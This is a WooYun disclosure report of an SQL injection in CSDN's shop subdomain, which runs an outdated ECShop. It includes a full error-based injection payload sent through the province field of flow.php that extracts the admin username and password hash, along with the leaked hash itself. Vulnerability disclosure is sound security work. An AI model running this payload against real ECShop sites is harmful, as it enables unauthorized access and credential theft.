csdn分站sql注入一枚

编号148682
Urlhttp://www.wooyun.org/bug.php?action=view&id=148682
漏洞状态厂商已经确认
漏洞标题csdn分站sql注入一枚
漏洞类型SQL注射漏洞
厂商CSDN开发者社区
白帽子Sunshie
提交日期2015-10-22 18:28:00
公开日期2015-12-06 18:32:00
修复时间(not set)
确认时间2015-10-22 00:00:00
Confirm Spend0
漏洞标签php+Mysql
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank5
漏洞简介
分站注入一枚 可获取后台管理员密码
漏洞细节

http://shop2.csdn.net/ 使用旧版本ecshop 导致注入
利用此漏洞 WooYun: ECSHOP全版本注入漏洞(二次注入)
首先注册一个会员 把任意商品加入购物车
然后提交post :http://shop2.csdn.net/flow.php?step=consignee&direct_shopping=1
data:

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password,0x3a) FROM ecs2_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1%23&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=


csdn.jpg


得到admin|f7b435a51d5388083ce1db0a084e3321

POC

csdn.jpg

修复方案

你懂的

状态信息 2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开
厂商回复尽快修复。
回应信息危害等级:中漏洞Rank:5 确认时间:2015-10-22 18:31
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

... rank太低还 看不到你的漏洞

h3hz02015-12-01 14:49:00